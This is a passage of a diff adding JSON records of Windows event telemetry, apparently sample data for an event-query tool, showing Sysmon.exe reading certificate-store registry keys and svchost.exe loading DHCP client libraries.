"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", + "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", + "registry_value": "SCHANNEL", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 